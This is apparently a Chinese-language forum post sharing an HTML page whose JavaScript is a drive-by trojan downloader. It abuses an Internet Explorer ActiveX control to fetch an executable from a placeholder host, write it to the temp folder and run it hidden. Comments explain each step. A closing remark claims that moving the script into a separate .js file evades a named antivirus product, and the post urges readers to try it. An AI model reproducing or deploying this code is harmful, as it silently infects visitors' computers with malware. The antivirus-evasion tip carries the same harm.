引用:

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" c />
<title>无标题文档</title>
</head>
<body>
<script language="javascript">
var strMuma="http://xxxx.com/xxx.exe";//定义要下载的木马
var obj=document.createElement("object");
var xmlhttp = obj.CreateObject("Microsoft.XMLHTTP","");//新建一个xmlhttp对象
var objAdob=obj.createobject("ADODB.Stream","");
var objFSO = obj.createobject("Scripting.FileSystemObject","");
var strExeName="xxx.exe";
var strTempPath = objFSO.GetSpecialFolder(1);//取的临时目录的位置,可改其他目录
obj.setAttribute("classid","clsid:BD96C556-65A3-11D0-983A-00C04FC29E36");
objAdob.Type=1;
xmlhttp.open("GET",strMuma,false);//开始把木马下下来
xmlhttp.send();
strExeName=objFSO.BuildPath(strTempPath,strExeName);
objAdob.Open();
objAdob.write(xmlhttp.responseBody);
objAdob.SaveToFile(strExeName,2);//保存木马
objAdob.Close();
var objShell = obj.createobject("Shell.Application","");
objShell.ShellExecute(strExeName,"","","open",0);//运行木马
</script>
</body>
</html>
1.为了大家看起来方便就没搞什么重组变量和加密的手续了,并加了点注释
2.貌似把上面的js保存为单独的js文件就可以过瑞星了

去试一下。。。